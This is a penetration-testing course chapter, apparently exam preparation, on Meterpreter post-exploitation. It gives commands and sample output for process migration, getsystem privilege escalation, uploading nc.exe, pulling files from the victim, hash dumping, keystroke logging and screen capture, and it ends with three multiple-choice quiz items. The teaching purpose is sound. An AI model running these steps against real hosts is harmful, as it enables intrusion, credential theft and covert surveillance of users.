6.3 Meterpreter Post-Exploitation Deep Dive
Key Takeaways
Meterpreter operates entirely in volatile system memory via Reflective DLL Injection, maintaining encrypted TLS communication and avoiding physical disk artifacts.
Process migration transfers the Meterpreter payload from volatile attack vectors into stable system processes (explorer.exe or svchost.exe) to prevent connection dropouts.
The
getsystemcommand automates Windows privilege escalation toNT AUTHORITY\SYSTEMthrough named pipe impersonation and token duplication techniques.Covert post-exploitation capabilities include in-memory keystroke sniffing (keyscan_start), dynamic screen capture (screenshot), file transfers, and automated host profiling modules.
6.3 Meterpreter Post-Exploitation Deep Dive
Gaining an initial foothold on a target system is only the first step in a penetration test. Once execution is achieved, an offensive security professional must understand what security boundaries exist, what privileges are assigned to the compromised process, and how to maneuver within the host without causing service disruptions or alerting defensive monitoring systems.
Meterpreter is an advanced, dynamically extensible post-exploitation payload designed specifically for stealth, operational flexibility, and forensic evasion. Unlike standard command shells (cmd.exe or /bin/sh) which spawn native operating system processes that write temporary files to disk, Meterpreter executes entirely within volatile memory (RAM). Understanding its architecture, core operational commands, privilege escalation mechanisms, and surveillance modules allows a penetration tester to extract critical intelligence and maintain stable command-and-control.
Meterpreter Architecture & In-Memory Operations
Meterpreter's stealth and resilience stem from its underlying design, pioneered by security researcher Stephen Fewer through Reflective DLL Injection (RDI).
+---------------------------------------------------------------------------------------+
| REFLECTIVE DLL INJECTION (RDI) |
+---------------------------------------------------------------------------------------+
| 1. Attacker transmits Meterpreter DLL over encrypted TLS socket to victim stager. |
| 2. Stager allocates RWX (Read-Write-Execute) memory inside the host process via |
| VirtualAlloc() or mmap(). |
| 3. In-memory Reflective Loader parses the DLL's internal PE headers, resolves symbols, |
| relocates memory addresses, and executes DllMain(). |
| 4. Meterpreter executes completely inside RAM without ever touching the physical disk.|
+---------------------------------------------------------------------------------------+
Reflective DLL Injection Mechanics
In standard Windows environments, loading a dynamic link library (.dll) requires the operating system loader via the LoadLibrary() API call. This standard process mandates that the DLL exist as a physical file on the filesystem and generates registry and file integrity monitoring (FIM) events.
Reflective DLL injection bypasses this requirement entirely:
- The Meterpreter stager allocates a block of memory with Read, Write, and Execute (
RWX) permissions inside the target process using the WindowsVirtualAlloc()API. - The stager writes the raw Meterpreter core DLL directly into this newly allocated memory buffer.
- Execution is transferred to an embedded Reflective Loader function compiled within the DLL itself. This loader mimics the Windows OS loader: it parses the DLL's internal Portable Executable (PE) headers, resolves external API imports directly from
kernel32.dllandntdll.dll, applies base relocations, and invokesDllMain(). - Because the file never touches the physical hard drive, traditional file-system antivirus scanners scanning for disk writes are completely bypassed.
Encrypted TLS Communications
All network communications between the Meterpreter client on the victim and the Metasploit multi-handler are conducted over encrypted Transport Layer Security (TLS) sockets using a binary Type-Length-Value (TLV) protocol. Because payloads and commands are transmitted through an encrypted tunnel, Network Intrusion Detection Systems (NIDS) and packet analyzers cannot inspect command strings, process listings, or exfiltrated data.
Dynamic Modular Extensibility
The base Meterpreter payload is intentionally lightweight. Specialized operational extensions are loaded dynamically across the encrypted socket on demand using the load command. Common extensions include:
load kiwi: Loads the updated Mimikatz credential extraction suite into target memory.load priv: Injects privilege escalation routines and token manipulation modules.load extapi: Adds extended Windows management APIs (clipboard sniffing, service control).load espia: Provides image and audio surveillance capabilities.
Core System Commands & Process Migration
Upon establishing a Meterpreter session, the operator's immediate priority is environmental profiling: determining system architecture, checking user privileges, and migrating into a stable process.
System Profiling and Identity Auditing
# Display target hostname, OS release, kernel build, and system architecture
meterpreter > sysinfo
Computer : WIN-DEV-SERVER
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Meterpreter : x64/windows
# Query the security context of the current session
meterpreter > getuid
Server username: WIN-DEV-SERVER\jdoe
# Identify the current process ID hosting the Meterpreter payload
meterpreter > getpid
Current pid: 3844
Process Migration with migrate
Initial exploitation frequently lands in a vulnerable host process that is unstable. For example, exploiting a web server buffer overflow may leave the web daemon in a corrupted state, or a user-launched exploit payload may terminate as soon as the user closes an application window. To ensure session survival, the penetration tester must migrate the Meterpreter thread into a long-running, stable process.
# List all running processes on the target
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
688 580 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1240 688 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
3412 1120 explorer.exe x64 1 WIN-DEV-SERVER\jdoe C:\Windows\explorer.exe
3844 3412 vuln_app.exe x86 1 WIN-DEV-SERVER\jdoe C:\Program Files\app.exe
Migrate into a stable process using its Process ID (PID) or process name:
# Migrate by Process ID (e.g., explorer.exe at PID 3412)
meterpreter > migrate 3412
[*] Migrating from 3844 to 3412...
[*] Migration completed successfully.
# Alternatively, migrate by executable name
meterpreter > migrate -N explorer.exe
| Candidate Process | Target Context | Stability Level | Strategic Rationale & Operational Notes |
|---|---|---|---|
explorer.exe | Standard Logged-in User | High | The primary graphical desktop shell. Remains active for the user's entire login session. Optimal for keystroke logging. |
svchost.exe | NT AUTHORITY\SYSTEM | Very High | Core Windows service host. Multiple instances run continuously; blends in with standard system traffic. |
spoolsv.exe | NT AUTHORITY\SYSTEM | High | The Windows Print Spooler daemon. Persistent background system service; rarely monitored by casual audits. |
lsass.exe | NT AUTHORITY\SYSTEM | High Risk | Local Security Authority Subsystem. Critical process; if a migration attempt fails, the OS triggers an immediate system restart. |
notepad.exe | Standard User | Very Low | Ephemeral process; terminates whenever the user exits the editor. Avoid for persistence. |
cmd.exe | Any Context | Low | Command prompt processes are heavily scrutinized by Security Operations Centers (SOCs) and EDR heuristics. |
Automated Privilege Escalation with getsystem
If the compromised user context is not SYSTEM (such as a local administrator operating under User Account Control constraints), Meterpreter provides the getsystem command to automate elevation to NT AUTHORITY\SYSTEM:
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In-Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Under the hood, getsystem attempts four distinct elevation techniques:
- Technique 1 (Named Pipe Impersonation - In Memory): Meterpreter creates a named pipe, connects to it with a service running under
SYSTEMprivileges, and calls the WindowsImpersonateNamedPipeClient()API to assume the security token of the connecting service. - Technique 2 (Named Pipe Impersonation - Dropping DLL): Similar to Technique 1, but drops a temporary helper DLL to disk to trigger the service connection.
- Technique 3 (Token Duplication): Directly searches running processes for existing
SYSTEMtokens and duplicates them viaOpenProcessToken()andDuplicateTokenEx(). - Technique 4 (Named Pipe Impersonation via RPCSS): Binds to the RPC Service Manager to force a privileged named pipe connection.
Dropping to Native Shell and Backgrounding Sessions
- To drop from Meterpreter into an interactive operating system command shell, issue
shell(which launchescmd.exeon Windows or/bin/shon Linux). Typeexitinside the shell to return to Meterpreter. - To return to the main Metasploit console without killing the session, issue
backgroundor pressCtrl+Zfollowed byy. - List active sessions with
sessions -land resume an active session withsessions -i <session_id>.
File System Operations & Data Exfiltration
Meterpreter includes robust built-in file management commands that allow operators to navigate directories, upload assessment binaries, search for flags, and exfiltrate sensitive files without spawning noisy command shell processes.
Navigation and Directory Commands
Meterpreter maintains separate concepts of remote directory (on the target) and local directory (on your Kali machine):
pwd/cd <path>: View and change the working directory on the target host.lpwd/lcd <path>: View and change the local working directory on the attacker's Kali machine.lsordir: List directory contents with file sizes, permissions, and timestamps.cat <remote_file>: Print the plaintext contents of a file directly to the console.edit <remote_file>: Open a remote file in the attacker's local text editor (e.g., Vim) over the encrypted socket.
Bidirectional File Transfers
Moving tools onto the victim and retrieving sensitive data are accomplished using upload and download:
# Upload a local enumeration tool to the target's temporary directory
meterpreter > upload /usr/share/windows-resources/binaries/nc.exe C:\\Windows\\Temp\\nc.exe
[*] uploading : /usr/share/windows-resources/binaries/nc.exe -> C:\Windows\Temp\nc.exe
[*] uploaded : /usr/share/windows-resources/binaries/nc.exe -> C:\Windows\Temp\nc.exe
# Download a sensitive configuration file or dynamic exam flag to Kali
meterpreter > download C:\\Users\\Administrator\\Desktop\\flag.txt /root/loot/flag.txt
[*] downloading: C:\Users\Administrator\Desktop\flag.txt -> /root/loot/flag.txt
[*] downloaded : C:\Users\Administrator\Desktop\flag.txt -> /root/loot/flag.txt
Recursive File Discovery with search
Locating sensitive documents, passwords, or flags across large directory trees can be automated using Meterpreter's search command:
# Search for text files containing 'flag' on the C: drive
meterpreter > search -f *flag*.txt -d C:\\
Found 2 results...
C:\Users\Public\flag1.txt (32 bytes)
C:\Users\Administrator\Desktop\flag2.txt (32 bytes)
# Search for configuration files containing database passwords
meterpreter > search -f *.config -d C:\\inetpub\\wwwroot\\
Advanced Post-Exploitation Modules & Surveillance
Beyond basic command execution, Meterpreter serves as a launcher for post-exploitation automation modules and real-time surveillance operations.
Running Post-Exploitation Gather Modules
Metasploit includes hundreds of post modules designed to execute against established sessions using the run command inside Meterpreter:
# Enumerate logged-on users and active remote desktop sessions
meterpreter > run post/windows/gather/enum_logged_on_users
# Detect virtualization environments (VMware, VirtualBox, Hyper-V, QEMU)
meterpreter > run post/windows/gather/checkvm
# Extract local SAM database password hashes into the Metasploit database
meterpreter > run post/windows/gather/smart_hashdump
# Enumerate installed software and missing Windows security updates
meterpreter > run post/windows/gather/enum_patches
Keystroke Logging (Sniffing)
Meterpreter provides in-memory keystroke logging without writing files to disk. To capture keystrokes reliably, the Meterpreter session must be migrated into a process that the target user actively interacts with (such as explorer.exe, chrome.exe, or wordpad.exe):
# 1. Migrate into the user's interactive desktop process
meterpreter > migrate -N explorer.exe
# 2. Start the in-memory keystroke capturing hook
meterpreter > keyscan_start
Starting the keystroke sniffer...
# 3. Interrogate the buffer and dump intercepted keystrokes
meterpreter > keyscan_dump
Dumping captured keystrokes...
Administrator <Shift>P@ssw0rd2026! <Return>
https://internal.corp/admin <Return>
# 4. Terminate the keystroke sniffer hook when finished
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
Visual Surveillance and Screen Capture
To view what the target user is currently seeing on their monitor, issue the screenshot command. Meterpreter captures the desktop frame buffer and saves it as a JPEG file locally on the attacker's system:
meterpreter > screenshot
[*] Screenshot saved to: /root/loot/eJpt_desktop_capture.jpeg
| Command | Parameters / Options | Subsystem | Functional Purpose & Tactical Use |
|---|---|---|---|
sysinfo | None | Host Profiling | Displays target hostname, OS release, kernel architecture, and language. |
getuid | None | Identity Auditing | Prints the active user account and security context of the current session. |
getpid | None | Process Auditing | Identifies the Process ID (PID) currently hosting the Meterpreter payload. |
ps | None | Process Auditing | Lists all running processes, process IDs, parent PIDs, and user contexts. |
migrate | <pid> or -N <name> | Process Injection | Injects Meterpreter into another active process to guarantee session persistence. |
getsystem | -t <technique_id> | Privilege Escalation | Elevates privileges to NT AUTHORITY\SYSTEM via named pipe impersonation. |
shell | None | Shell Execution | Spawns an interactive operating system command interpreter (cmd.exe or /bin/sh). |
upload | <local_src> <remote_dst> | File Transfer | Copies tools, scripts, or binaries from Kali to the victim machine. |
download | <remote_src> <local_dst> | Data Exfiltration | Copies sensitive files, flags, or configuration archives from victim to Kali. |
search | -f <pattern> -d <dir> | File Discovery | Recursively searches directories for specific filenames, extensions, or patterns. |
keyscan_start | None | Surveillance | Injects in-memory keyboard event hook to record user keystrokes covertly. |
keyscan_dump | None | Surveillance | Dumps captured keystrokes from memory buffer directly to the operator console. |
screenshot | None | Surveillance | Grabs a bitmap screenshot of the active user desktop and saves it locally. |
What is the primary architectural and anti-forensic advantage of Meterpreter's Reflective DLL Injection (RDI) compared to traditional payload execution?
It injects the payload directly into volatile process memory without writing binary files to the physical hard drive
It automatically patches all operating system vulnerabilities on the target to block competing threat actors
It converts all outbound network packets into unencrypted ICMP echo requests to bypass firewalls
It reconfigures the target machine's BIOS firmware to ensure persistence across hardware replacements
A penetration tester compromises a Windows server through an unpatched web application service running under a local user account. Which immediate operational action prevents the session from terminating if the web daemon crashes?
Executing the reboot command inside Meterpreter to force the machine into safe mode
Running upload nc.exe C:\Windows\System32\nc.exe to replace the command interpreter
Listing active processes with ps and migrating the Meterpreter payload into explorer.exe or svchost.exe
Issuing getsystem -t 2 to permanently lock the operating system process table
A penetration tester needs to capture administrative credentials entered by a logged-in user on a Windows target. What is the correct sequence of Meterpreter actions required to sniff keystrokes?
Issue download /var/log/auth.log followed by cat credentials.txt
Run getsystem, followed by execute -f cmd.exe -i and entering echo %password%
Execute run post/windows/gather/checkvm and issue screenshot every 5 seconds
Migrate into the target user's interactive explorer.exe process, execute keyscan_start, and retrieve inputs with keyscan_dump
Sections you finish are checked off in the contents.